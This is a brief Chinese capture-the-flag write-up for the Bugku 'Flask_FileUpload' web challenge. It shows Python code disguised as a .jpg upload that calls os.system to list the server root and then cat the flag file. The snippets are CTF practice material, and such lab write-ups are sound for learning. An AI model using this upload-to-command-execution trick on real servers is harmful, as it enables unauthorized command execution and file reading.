技术栈

Bugku-web-Flask_FileUpload

黑白时光les2024-08-01 11:52

Bugku-web-Flask_FileUpload

查看源代码,提示用python返回结果

在file.jpg中写python代码

复制代码
import os
os.system('ls / ')

上传后查看源代码,找到flag文件夹

修改代码

复制代码
import os
os.system('cat /flag ')
上一篇:Python面试题:如何使用WebSocket实现实时Web应用
下一篇:单片机之串口通信协议
相关推荐
锋行天下
1 小时前
半秒开!还有谁!!!
前端·vue.js·架构
代码搬运媛
2 小时前
git 下中文文件名乱码问题解决
前端
CaffeinePro
2 小时前
告别知识点零散!React零基础通关,从环境搭建到Ant Design页面实战
前端·react.js
cidy_98
2 小时前
水龙头领不到测试币?手把手用 Hardhat 本地环境零门槛学以太坊交易
前端
因_崔斯汀
2 小时前
Three.js 3D 地图特效与材质实现指南
前端
angerdream
2 小时前
手把手编写儿童手机远程监控App之vue3用 AI Agent生成菜单
前端
cidy_98
2 小时前
Git Pull 代码冲突后完整回退教程
前端
JING小白
2 小时前
Day 1 重学Vue:响应式系统的“底层逻辑”变更,Vue2旧时代的终结与Vue3新时代的开启
前端·vue.js
张就是我106592
2 小时前
一个 ZIP 文件,把 webshell 写到了不该在的地方
前端
张就是我106592
3 小时前
SPIP 的一个漏洞:你以为过滤了,其实没过滤干净
前端
热门推荐
012026 年 AI 编程工具终极横评:Cursor vs Claude Code vs Copilot vs Windsurf02GitHub 镜像站点032026年6月AI大模型全景报告:GPT-5.6、Claude Opus 4.8、Gemini 3.5,中美AI三足鼎立谁主沉浮?042026年6月AI行业全景:从百模大战到Agent元年,这30天发生了什么?05【AI】2026 年具身智能模型和世界模型总结06Trae国际版与国内版深度测评:AI原生IDE的双生花07Claude Code、Codex、Cursor三分天下:2026年AI编程Agent生态全景剖析082026 AI 编程工具终极实战指南:Cursor vs Claude Code vs Copilot,开发者该怎么选?09飞书长连接_事件订阅(接收消息,审批任务状态变更)102026 年 AI 大模型 & AI 编程工具实战全总结